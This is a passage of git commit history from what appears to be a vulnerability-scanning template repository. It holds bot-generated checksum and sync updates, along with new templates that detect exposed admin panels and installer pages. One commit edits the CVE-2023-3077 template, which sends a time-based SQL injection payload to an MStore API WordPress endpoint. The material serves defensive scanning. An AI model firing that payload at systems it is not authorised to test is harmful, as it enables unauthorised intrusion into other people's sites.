http/exposed-panels/cisco-unity-panel.yaml:6fae7cdb91904c1e5848876a1de55d505ef868bb http/exposed-panels/citrix-adc-gateway-detect.yaml:799ec0472142a2c95e6aa9611b7ad1404bd0b433 http/exposed-panels/citrix-vpn-detect.yaml:6d5b20d32d07689c25e8552271fde112a03f301c @@ -8572,7 +8573,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6846caba734b2f189845b0d4401d9a821b0c352a +templates-checksum.txt:7f6572fd3b1171faed95bc9512f0bfba664e1923 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 60ac56d35cac4ee9a7f22c9f79d86e2d27d15a9b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:16:28 +0000 Subject: [PATCH 1420/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index eb2b7515c3..0ab3bc39c7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' From 0e89cf131af54eab375266407698accd50e0bbed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:17:40 +0000 Subject: [PATCH 1421/1768] Auto Template Signing [Tue May 28 08:17:40 UTC 2024] :robot: --- http/cves/2022/CVE-2022-34534.yaml | 1 + http/technologies/gotweb-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index fae020741f..d997949422 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -38,3 +38,4 @@ http: - 'contains(header, "application/json")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100b929a8a54afa3e963a79545f42fc9bdb1dddd4510cd9fbdb0f34370d45eeef54022100ef046751c804e934307fb72d4183de3b54ab818022b2c7b7e0bb35b6bc09269e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/gotweb-detect.yaml b/http/technologies/gotweb-detect.yaml index d4c2959378..8e2078ec9d 100644 --- a/http/technologies/gotweb-detect.yaml +++ b/http/technologies/gotweb-detect.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205504c5fe1b00986f68d46e91a7847a7369a6a1aeed9e8a8b009e4699a085639602201b2a268978bb59434f09cd5ea4b7e7ca053e022af5c0b186f1d032c6cdfe1b8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9cb01fdd00eb10b82a347823c08a461da6ff3dd5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 14:06:32 +0530 Subject: [PATCH 1422/1768] Create digital-watchdog-panel.yaml --- .../digital-watchdog-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/digital-watchdog-panel.yaml diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml new file mode 100644 index 0000000000..a347524716 --- /dev/null +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -0,0 +1,27 @@ +id: digital-watchdog-panel + +info: + name: Digital Watchdog - Detect + author: ritikchaddha + severity: info + description: | + Digital Watchdog panel was detected. + metadata: + max-request: 1 + verified: true + fofa-query: icon_hash="868509217" + shodan-query: http.favicon.hash:868509217 + tags: digital-watchdog,panel,detect,login,dw,spectrum + +http: + - method: GET + path: + - "{{BaseURL}}/static/images/favicon.ico" + - "{{BaseURL}}/static/customization/favicon.ico" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "status_code==200 && ('868509217' == mmh3(base64_py(body)))" From fc8bbb2aee7d2afcd270a000ebcf4ea61d9bc89f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:40:39 +0000 Subject: [PATCH 1423/1768] Auto Generated New Template Addition List [Tue May 28 08:40:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 24579f4fac..088d1e3152 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From 442133a7470a901559af3ce9f8a0eac353790046 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:40:44 +0000 Subject: [PATCH 1424/1768] Auto Generated Templates Checksum [Tue May 28 08:40:44 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a5daed5fe1..4d36c324bc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2727,7 +2727,7 @@ http/cves/2022/CVE-2022-34093.yaml:d833077c3ed2bacc7f3727cc8b423acfc2a3ac5a http/cves/2022/CVE-2022-34094.yaml:dab272e28788fe06a9fba7dcfb3794e42b03f59f http/cves/2022/CVE-2022-34121.yaml:80284aa2ee2e18c06f64a2744b0215855866624c http/cves/2022/CVE-2022-34328.yaml:6c4ef061ec996841be3e4b953085fd717719a55c -http/cves/2022/CVE-2022-34534.yaml:824d6f0bde84220544d30db4a3423ccc9ab42892 +http/cves/2022/CVE-2022-34534.yaml:9ffb8d48988fbf1da5a24e59db586356c05d2c9b http/cves/2022/CVE-2022-34576.yaml:b3007f2a02f22b1b712f6c3dce81e78d002de661 http/cves/2022/CVE-2022-34590.yaml:976120387598d43ed2f73139b0b4b0e641cdeff3 http/cves/2022/CVE-2022-34753.yaml:27251e7b69ecc21f41223cab8a946027d57de4f3 @@ -5423,6 +5423,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/fleetcart-installer.yaml:74f546acf0efc56a070cc599f27750eb435a424c http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a @@ -6765,7 +6766,7 @@ http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333 http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb -http/technologies/gotweb-detect.yaml:8fc5e3378e4984c8e405a36d33067d00f719889f +http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0 http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:968b73b40f5fcb70f7ce8ed1c620f59611886e97 http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 @@ -8573,7 +8574,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f6572fd3b1171faed95bc9512f0bfba664e1923 +templates-checksum.txt:34021addf8a4e019d1b4fbd148bbb25b5d32e69e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 28bc3690e4b5845737847a5fcb14a4d3c5511e7c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:41:29 +0000 Subject: [PATCH 1425/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0ab3bc39c7..4cee8c2b81 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From 4cd6f142ef3c4d0efe7df6cfcced07cc80214f0a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 14:11:54 +0530 Subject: [PATCH 1426/1768] fix template --- http/cves/2023/CVE-2023-3077.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 2a61a79863..7cefd1f336 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -1,7 +1,7 @@ id: CVE-2023-3077 info: - name: MStore API < 3.9.8 - Unauthenticated Blind SQL Injection + name: MStore API < 3.9.8 - SQL Injection author: DhiyaneshDK severity: critical description: | @@ -21,12 +21,13 @@ info: epss-percentile: 0.50816 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: - verified: treu + max-request: 2 + verified: true vendor: inspireui product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" - tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli flow: http(1) && http(2) @@ -43,9 +44,11 @@ http: - 'contains(body, "MStore API")' condition: and - - method: GET - path: - - "{{BaseURL}}/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+-" + - raw: + - | + @timeout: 15s + GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl From d13b2d1a624ad01609b6d40ce241d1b4dd19b9bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:42:26 +0000 Subject: [PATCH 1427/1768] Auto Template Signing [Tue May 28 08:42:26 UTC 2024] :robot: --- http/misconfiguration/installer/fleetcart-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/fleetcart-installer.yaml b/http/misconfiguration/installer/fleetcart-installer.yaml index 5f1c3542a1..b682e038cc 100644 --- a/http/misconfiguration/installer/fleetcart-installer.yaml +++ b/http/misconfiguration/installer/fleetcart-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221009dbdb0636df294b6b48c1eb7dfc061a7aa3c85c960f99c89ab56e7e7487e59df022100db0e9e47e99f04040df638b39232702e72eb96e41d16fa63b5b698419b926bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c4fa4f50157b59dc6d638e1dca342025616de362 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:58:24 +0000 Subject: [PATCH 1428/1768] Auto Generated New Template Addition List [Tue May 28 08:58:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 088d1e3152..b837ae98d7 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml +http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-5230.yaml From 34fed58f818136b78ba104dc9ac38e11d72d63b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:58:29 +0000 Subject: [PATCH 1429/1768] Auto Generated Templates Checksum [Tue May 28 08:58:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4d36c324bc..6098fa1085 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3028,6 +3028,7 @@ http/cves/2023/CVE-2023-30256.yaml:c8ff7db1046cfba64af40cf83389cb0aecad9dd6 http/cves/2023/CVE-2023-30258.yaml:778e4e61140adf7c5254116c77fc8a4ae90c59db http/cves/2023/CVE-2023-30534.yaml:1e7e038bd6a2c2f5cba13e80bcd1a2ce1faea3c5 http/cves/2023/CVE-2023-30625.yaml:07288271ea2118572d231f5b97192b928d4adc41 +http/cves/2023/CVE-2023-3077.yaml:abb40e9faaf7e46431f44b4c248a1c48b6bb5287 http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c @@ -5423,7 +5424,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/fleetcart-installer.yaml:74f546acf0efc56a070cc599f27750eb435a424c +http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a @@ -8574,7 +8575,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:34021addf8a4e019d1b4fbd148bbb25b5d32e69e +templates-checksum.txt:79dc057904896924eda5d56bff18c87ffc191c34 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2a887f4aae8ee4d06a619ba233546f1734309269 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:59:29 +0000 Subject: [PATCH 1430/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4cee8c2b81..b19db68056 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' + - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' From eafcbc69c56af1319d90a43a35225ec51d43b2dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 09:00:03 +0000 Subject: [PATCH 1431/1768] Auto Template Signing [Tue May 28 09:00:03 UTC 2024] :robot: --- http/cves/2023/CVE-2023-3077.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 7cefd1f336..c30c0baedf 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -56,3 +56,4 @@ http: - 'duration>=6' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100c0dcbeb57b4e99aa73a40a91cba812a27203182bca95ab6b14d25f64a6a6cedc022100f9d201151cf04d6e74c390f8a539f56663322adfec3fd01c59b4a895a124695f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 31d008008e53b26c490ad019a5212f169b0b05fd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 14:33:13 +0530 Subject: [PATCH 1432/1768] Create flarum-installer.yaml --- .../installer/flarum-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/flarum-installer.yaml diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml new file mode 100644 index 0000000000..f7df6feb30 --- /dev/null +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -0,0 +1,33 @@ +id: flarum-installer + +info: + name: Flarum Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Flarum installation pages which could allow unauthorized access or information disclosure. + reference: + - https://flarum.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Install Flarum" + tags: misconfig,install,exposure,flarum + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install Flarum" + - "Admin Password" + condition: and + + - type: status + status: + - 200 From 9b20134f147abc6b6d003e4809e65cadf0392518 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 14:42:15 +0530 Subject: [PATCH 1433/1768] Create busybox-repository-browser.yaml --- .../busybox-repository-browser.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/busybox-repository-browser.yaml diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml new file mode 100644 index 0000000000..c1a5b6144e --- /dev/null +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -0,0 +1,33 @@ +id: busybox-repository-browser + +info: + name: Busybox Repository Browser - Detect + author: ritikchaddha + severity: info + description: | + Busybox Repository Browser was detected. + reference: + - https://github.com/mirror/busybox + metadata: + max-request: 1 + verified: true + fofa-query: title="Busybox Repository Browser" + tags: detect,busybox,oss + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Busybox Repository Browser" + - "index" + condition: and + + - type: status + status: + - 200 From 13e35b43d8d5b921ff326f6b2e13a18a0a24815c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 09:13:22 +0000 Subject: [PATCH 1434/1768] Auto Generated New Template Addition List [Tue May 28 09:13:22 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b837ae98d7..1568df1e30 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/technologies/gotweb-detect.yaml From 79bbc7a9a3869a99950de6cc54afab886d67e928 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 09:13:31 +0000 Subject: [PATCH 1435/1768] Auto Generated Templates Checksum [Tue May 28 09:13:31 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6098fa1085..17950f6572 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3028,7 +3028,7 @@ http/cves/2023/CVE-2023-30256.yaml:c8ff7db1046cfba64af40cf83389cb0aecad9dd6 http/cves/2023/CVE-2023-30258.yaml:778e4e61140adf7c5254116c77fc8a4ae90c59db http/cves/2023/CVE-2023-30534.yaml:1e7e038bd6a2c2f5cba13e80bcd1a2ce1faea3c5 http/cves/2023/CVE-2023-30625.yaml:07288271ea2118572d231f5b97192b928d4adc41 -http/cves/2023/CVE-2023-3077.yaml:abb40e9faaf7e46431f44b4c248a1c48b6bb5287 +http/cves/2023/CVE-2023-3077.yaml:d3b8b7a4a10118402a6d5118a60abf75a01c954c http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c @@ -5424,6 +5424,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/flarum-installer.yaml:f2e2c800673831cb7a4ea8053f2e45d2a93e39bb http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc @@ -8575,7 +8576,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:79dc057904896924eda5d56bff18c87ffc191c34 +templates-checksum.txt:64c35ec6a109228def6cb0555862542b66f1416b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2e0f220cc717ab632826d76c7ebf3a77f5eeb766 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 09:14:03 +0000 Subject: [PATCH 1436/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b19db68056..391b388721 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/technologies/gotweb-detect.yaml' From 972555cbb6fd3d643512d00a3e08b0c64da7b22e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 09:15:12 +0000 Subject: [PATCH 1437/1768] Auto Template Signing [Tue May 28 09:15:12 UTC 2024] :robot: --- http/misconfiguration/installer/flarum-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml index f7df6feb30..1e193e60ca 100644 --- a/http/misconfiguration/installer/flarum-installer.yaml +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f7723fe2a9f78c7ecfe9f172980e68550dfd50cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 14:48:28 +0530 Subject: [PATCH 1438/1768] Create stackposts-installer.yaml --- .../installer/stackposts-installer.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/installer/stackposts-installer.yaml diff --git a/http/misconfiguration/installer/stackposts-installer.yaml b/http/misconfiguration/installer/stackposts-installer.yaml new file mode 100644 index 0000000000..08781a7f4a --- /dev/null +++ b/http/misconfiguration/installer/stackposts-installer.yaml @@ -0,0 +1,32 @@ +id: stackposts-installer + +info: + name: StackPosts Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed StackPosts installation page. + reference: + - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Install - StackPosts" + fofa-query: icon_hash="700046539" + tags: misconfig,install,exposure,stackposts + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install - StackPosts - Social Marketing Tools" + + - type: status + status: + - 200 From b829ae2a3d056f052021f5cd27e3943842177f88 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 14:53:14 +0530 Subject: [PATCH 1439/1768] Create librenms-installer.yaml --- .../installer/librenms-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/librenms-installer.yaml diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml new file mode 100644 index 0000000000..07e0c9cbf8 --- /dev/null +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -0,0 +1,31 @@ +id: librenms-installer + +info: + name: LibreNMS Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed LibreNMS installation page. + reference: + - https://docs.librenms.org/Installation/Install-LibreNMS/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"LibreNMS Install" + tags: misconfig,install,exposure,librenms + +http: + - method: GET + path: + - "{{BaseURL}}/install/checks" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "LibreNMS Install" + + - type: status + status: + - 200 From cb840f9a4f208999367c88b006b07843cc05dcdc Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Tue, 28 May 2024 14:27:25 +0330 Subject: [PATCH 1440/1768] Update tech-detect.yaml & add clickhouse --- http/technologies/tech-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 21d19515ab..3840e0efa9 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3726,4 +3726,11 @@ http: part: server words: - "istio-envoy" + + - type: word + name: clickhouse + part: header + words: + - "X-ClickHouse-Summary" + case-insensitive: true # digest: 4b0a00483046022100ba8d6eae9311c902babb5fce09a84ba79bb0317dbf6caca514245e0c60a3b3520221009ce0d2c9c1144d45590bfed8ab4c81f6bde45a053a2b3156d25bdb4aba006253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4234d76420c997be44c555479b9a2327a0220a39 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 